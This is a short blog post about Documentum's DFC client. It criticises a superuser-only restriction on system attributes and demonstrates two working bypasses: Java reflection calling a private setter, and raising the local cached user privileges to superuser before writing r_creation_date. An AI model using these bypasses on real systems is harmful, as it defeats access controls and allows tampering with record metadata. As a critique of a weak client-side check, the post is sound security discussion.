Dumb superuser check in DFC

I have no idea about whose brilliant idea was to make setting values of attributes starting with “r_” and “i_” accessible only to superuser or EMC code (com.documentum.fc package):

API> create,c,dm_sysobject
...
0801ffd780095628
API> save,c,l
...
OK
API> set,c,l,r_creation_date
SET> 01/01/2013
...
[DM_API_E_UPDATE_BAD_ATTR]error:  "The attribute 'r_creation_date' is not updateable."

but this restriction is completely stupid and could be bypassed by either following DFC code (inside TBO we can use setTimeInternal method without reflection):

IDfSysObject object = (IDfSysObject) session.newObject("dm_document");  
Method setTimeInternal = DfTypedObject.class.getDeclaredMethod(  
        "setTimeInternal", String.class, IDfTime.class);  
setTimeInternal.setAccessible(true);  
setTimeInternal.invoke(((IPersistentObject) object).getProxyHandler()  
        .____getImp____(), "r_creation_date", new DfTime()); 

or by poisoning DFC cache:

API> retrieve,c,dm_user where user_name=USER
...
1101ffd780001911
API> set,c,l,user_privileges
SET> 16
...
OK
API> create,c,dm_sysobject
...
0801ffd780095629
API> save,c,l
...
OK
API> set,c,l,r_creation_date
SET> 01/01/2013
...
OK
API> save,c,l
...
OK
API> get,c,l,r_creation_date
...
1/1/2013 00:00:00

One thought on “Dumb superuser check in DFC

  1. Pingback: Copying version tree | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s